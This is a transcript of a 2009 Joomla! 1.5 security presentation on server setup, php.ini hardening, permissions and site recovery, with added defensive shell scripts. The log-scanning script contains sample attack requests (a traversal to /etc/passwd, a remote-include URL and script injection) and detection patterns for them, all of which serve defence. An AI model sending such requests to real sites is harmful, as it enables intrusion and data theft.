Joomladay Netherlands - Security
Joomla security presentation given on the Dutch Joomladay


Usage Rights: © All Rights Reserved

Presentation Transcript

  • Joomla! 1.5 Security. Joomla!day presentation, Utrecht, Netherlands, 12 June 2009
  • Is Joomla! safe?
  • Is the World Wide Web Safe?
  • "You know, I don't mean any disrespect, but I had to chuckle at the question 'Is Joomla! not safe?' since it reminded me of the movie The Marathon Man, when the dentist is pulling Dustin Hoffman's teeth out, asking 'Is it safe?', and he's so desperate to get the dentist to stop that he says 'Yes' or 'No' or 'What do you want to hear?'" Is Joomla! safe? Quote taken from:
  • "I would say: anyone who tells a community that a Web site or an out-of-the-box solution is safe is not being responsible. No, it is not 'safe' on the Internet."
  • Presentation overview: what is this presentation about?
    • Getting Started
    • Hosting and Server Setup
    • Joomla Setup
    • Site Administration
    • Site Recovery
  • Getting started
  • Some basic things before we go into details:
    • Report a (possible) hack to the JSST
    • Please don't publish hacks or proof-of-concept code out in the open; also report them to the JSST
    • Stay informed!
      • Automatic email notification
      • RSS feed
  • Hosting and server set up: shared hosting or dedicated hosting?
  • Hosting and server set up: "register_globals", "open_basedir"
    • Configure Apache:
      • Secure important areas with .htaccess
      • Use mod_rewrite and mod_security to block PHP attacks
    • Configure MySQL:
      • Implement user accounts on a "need-to-know" basis (grant only the privileges the site needs)
    • Configure PHP:
      • Use PHP 5!
      • Configure your php.ini file properly (often restricted on shared hosts)
    • Configure php.ini:
      • Use disable_functions to disable dangerous PHP functions that your site does not need
      • Use PHP open_basedir
      • Don't use PHP safe_mode (it gives a false sense of security)
      • Don't use PHP register_globals
      • Don't use PHP allow_url_fopen; this option enables the URL-aware fopen wrappers, which let URLs be opened like local files
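As an added illustration of the php.ini points above (this script is not part of the presentation), a POSIX shell audit that reads a php.ini and reports which of the listed settings deviate from the slides' advice. The two sample files, one weak and one hardened, are constructed here; the open_basedir paths and the disable_functions list are placeholders to adapt per site.

```shell
#!/bin/sh
# Added example, not part of the presentation: audit a php.ini for the settings
# the slides call out. Assumption: a plain "key = value" php.ini; the paths in
# open_basedir and the disable_functions list below are placeholders.

# Two constructed sample files: the weak configuration beside the hardened one.
SAMPLE_INI=$(mktemp)
HARDENED_INI=$(mktemp)
trap 'rm -f "$SAMPLE_INI" "$HARDENED_INI"' EXIT
cat > "$SAMPLE_INI" <<'EOF'
; weak: everything the slides say not to use
register_globals = On
safe_mode = On
allow_url_fopen = On
open_basedir =
disable_functions =
EOF
cat > "$HARDENED_INI" <<'EOF'
; hardened: what the slides recommend
register_globals = Off
safe_mode = Off
allow_url_fopen = Off
open_basedir = /var/www/example-site:/tmp   ; placeholder paths
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
EOF

# ini_value FILE KEY: value of KEY with trailing ';' comment and whitespace
# stripped; the last occurrence wins, as in PHP. Empty when the key is unset.
ini_value() {
    sed -n 's/^[[:space:]]*'"$2"'[[:space:]]*=[[:space:]]*\(.*\)$/\1/p' "$1" \
        | sed 's/[[:space:]]*;.*$//; s/[[:space:]]*$//' | tail -n 1
}

# is_on VALUE: PHP reads On, 1, true and yes as enabled.
is_on() {
    case "$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')" in
        on|1|true|yes) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_php_ini FILE: one OK/FAIL line per check plus a SUMMARY line.
audit_php_ini() {
    fails=0
    for key in register_globals safe_mode allow_url_fopen; do
        value=$(ini_value "$1" "$key")
        # PHP's built-in default for allow_url_fopen is On, so unset counts as enabled.
        [ -z "$value" ] && [ "$key" = allow_url_fopen ] && value=On
        if is_on "$value"; then
            echo "FAIL $key is enabled; set it to Off"
            fails=$((fails + 1))
        else
            echo "OK   $key is off"
        fi
    done
    for key in open_basedir disable_functions; do
        value=$(ini_value "$1" "$key")
        if [ -z "$value" ]; then
            echo "FAIL $key is empty; set it"
            fails=$((fails + 1))
        else
            echo "OK   $key = $value"
        fi
    done
    echo "SUMMARY $fails failing check(s) in $1"
}

# count_fails FILE: just the number of FAIL lines.
count_fails() {
    audit_php_ini "$1" | grep -c '^FAIL' || true
}

audit_php_ini "$SAMPLE_INI"
audit_php_ini "$HARDENED_INI"
```

Run it against the real file with `audit_php_ini /path/to/php.ini` (`php --ini` shows which file is loaded). On a shared host you may not be able to edit php.ini at all, which is the limitation the slide mentions. Note also that register_globals and safe_mode were removed from PHP in 5.4, so on a current PHP build only the other three checks apply.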
  • Joomla! setup
    • Some basic rules to think about:
      • Only install official Joomla! versions!
      • Change the default administrator username
      • Protect directories and files
        • Move crucial files outside the public directory
        • Ensure that all configurable paths to writable or uploadable directories
        • Protect your log directory (move it out of the document root or protect it with .htaccess)
      • Adjust file and directory permissions
        • Set critical directories to 755
        • Set file permissions to 644
      • Remove unneeded files
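The permission and log-directory rules above, carried out in shell as an added example (not the project's own tooling). It builds a small constructed site tree with sloppy permissions, applies the 755/644 rule, reports anything that still deviates, and drops a deny-all .htaccess into the log directory. The Apache 2.2-style `Order deny,allow` / `Deny from all` syntax is assumed, matching the Apache of the presentation's era.

```shell
#!/bin/sh
# Added example (not Joomla project code): apply the 755/644 permission rule to a
# site tree, report anything that deviates, and .htaccess-protect a log directory.
# Assumptions: Apache 2.2-style access control and a sample tree constructed
# under a temporary directory.

SITE=$(mktemp -d)
trap 'rm -rf "$SITE"' EXIT

# Constructed sample tree with deliberately sloppy permissions.
mkdir -p "$SITE/images" "$SITE/logs"
echo '<?php // placeholder' > "$SITE/index.php"
echo 'placeholder settings' > "$SITE/configuration.php"
echo 'placeholder log' > "$SITE/logs/error.php"
chmod 777 "$SITE" "$SITE/images" "$SITE/logs"
chmod 666 "$SITE/index.php" "$SITE/configuration.php" "$SITE/logs/error.php"

# count_bad_permissions ROOT: number of directories not 755 plus files not 644.
count_bad_permissions() {
    { find "$1" -type d ! -perm 755; find "$1" -type f ! -perm 644; } | wc -l | tr -d ' '
}

# fix_permissions ROOT: directories to 755, files to 644, as the slides recommend.
fix_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# protect_dir DIR: deny all web access to DIR with a .htaccess file (Apache 2.2 syntax).
protect_dir() {
    printf 'Order deny,allow\nDeny from all\n' > "$1/.htaccess"
    chmod 644 "$1/.htaccess"
}

# is_protected DIR: succeed if DIR carries a "Deny from all" .htaccess.
is_protected() {
    [ -f "$1/.htaccess" ] && grep -q '^Deny from all' "$1/.htaccess"
}

BEFORE=$(count_bad_permissions "$SITE")
echo "deviations before: $BEFORE"
fix_permissions "$SITE"
protect_dir "$SITE/logs"
echo "deviations after: $(count_bad_permissions "$SITE")"
```

`count_bad_permissions` is the check worth scheduling: running it from cron against the live document root catches permissions that drift back after an extension install or a careless FTP upload. The .htaccess only works if Apache honours `AllowOverride` for that directory, which is why the slide gives moving the log directory out of the document root as the first option.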
    • Before you install extensions
      • Always backup (even on your test system)
      • Always test before you install on your live server
      • Check for extension vulnerabilities
      • Download from trusted sites
      • User beware! Check the code quality
      • Test! Test! Test!
      • Remove junk files (all that is not needed)
      • Avoid encrypted code
  • Site administration
    • Use well-formed passwords
    • Maintain a strong site backup process
    • Monitor break-in attempts with a file-integrity checker (Tripwire, Samhain)
    • Perform manual intrusion detection (manual logfile scan)
    • Stay current with security patches and upgrades
  • Site recovery
    • Get help the right way
    • Follow a logical and rigorous recovery process
    • Reset your administrator password (and those of all admins/super admins)
    • Find exploit attempts using the *NIX shell
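An added example of the "find exploit attempts using the *NIX shell" step, written here rather than taken from the slides: a short scan over an Apache access log that tags requests carrying common exploit-attempt indicators and ranks the source addresses. The log lines are constructed samples (addresses from the 192.0.2.0/24 and 203.0.113.0/24 documentation ranges), and the indicator labels and patterns are this example's own starting point, not a complete signature set.

```shell
#!/bin/sh
# Added example (not from the slides): scan an Apache access log for common
# exploit-attempt indicators with standard *NIX tools. The log lines are
# constructed samples using documentation IP ranges.

ACCESS_LOG=$(mktemp)
trap 'rm -f "$ACCESS_LOG"' EXIT
cat > "$ACCESS_LOG" <<'EOF'
192.0.2.10 - - [12/Jun/2009:10:00:01 +0200] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.20 - - [12/Jun/2009:10:00:02 +0200] "GET /index.php?option=com_example&file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.20 - - [12/Jun/2009:10:00:03 +0200] "GET /index.php?option=com_example&path=http://203.0.113.5/x.txt? HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.30 - - [12/Jun/2009:10:00:04 +0200] "GET /index.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jun/2009:10:00:05 +0200] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
192.0.2.40 - - [12/Jun/2009:10:00:06 +0200] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF

# flag_request LINE: print an indicator label per matching pattern (labels are
# this example's own): directory traversal, remote include via a URL in a
# parameter, script injection, null-byte tricks.
flag_request() {
    line=$1
    printf '%s' "$line" | grep -qE '\.\./' && echo traversal
    printf '%s' "$line" | grep -qiE '=https?://' && echo remote-include
    printf '%s' "$line" | grep -qiE '(%3C|<)script' && echo script-injection
    printf '%s' "$line" | grep -q '%00' && echo null-byte
    return 0
}

# scan_access_log FILE: print "<ip> <indicator> <request>" for each flagged line.
scan_access_log() {
    while IFS= read -r line; do
        ip=${line%% *}
        request=$(printf '%s' "$line" | cut -d'"' -f2)
        for tag in $(flag_request "$line"); do
            echo "$ip $tag $request"
        done
    done < "$1"
}

# suspicious_ips FILE: source addresses ranked by number of flagged requests.
suspicious_ips() {
    scan_access_log "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

scan_access_log "$ACCESS_LOG"
suspicious_ips "$ACCESS_LOG"
```

During recovery the ranked list tells you which addresses to pull the full request history for, and the tagged requests tell you which extension parameters were being probed, which is what you need when deciding which components to remove or patch. The patterns are deliberately simple; expect false positives on legitimate URLs that carry other URLs as parameters, and extend the list with what your own logs show.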
  • Links
    • Documentation wiki:
    • Joomla! Security Strike Team (JSST):
    • Report issues to the JSST:
  • Sites to put RSS feeds on (sites to monitor when you take security seriously)
    • Joomla! related
    • Operating systems related
  • Questions?